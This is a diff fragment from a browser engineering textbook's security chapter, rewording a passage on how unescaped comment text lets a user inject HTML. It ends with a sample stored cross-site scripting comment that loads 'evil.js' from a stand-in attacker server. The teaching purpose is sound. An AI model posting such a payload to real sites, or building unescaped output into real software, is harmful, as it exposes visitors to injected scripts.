browserengineering/book/book/security.md

 out += "<i>by " + who + "</i></p>"
 ```

-Note that `entry` can be anything, anything the user might stick into
+Note that `entry` can be anything, including anything the user might
-our comment form.
-That includes HTML tags, like a custom `<script>`
+stick into our comment form.
+That includes HTML tags, like a custom
-tag!
+`<script>` tag!
 So, a malicious user could post this comment:

     Hi! <script src="http://my-server/evil.js"></script>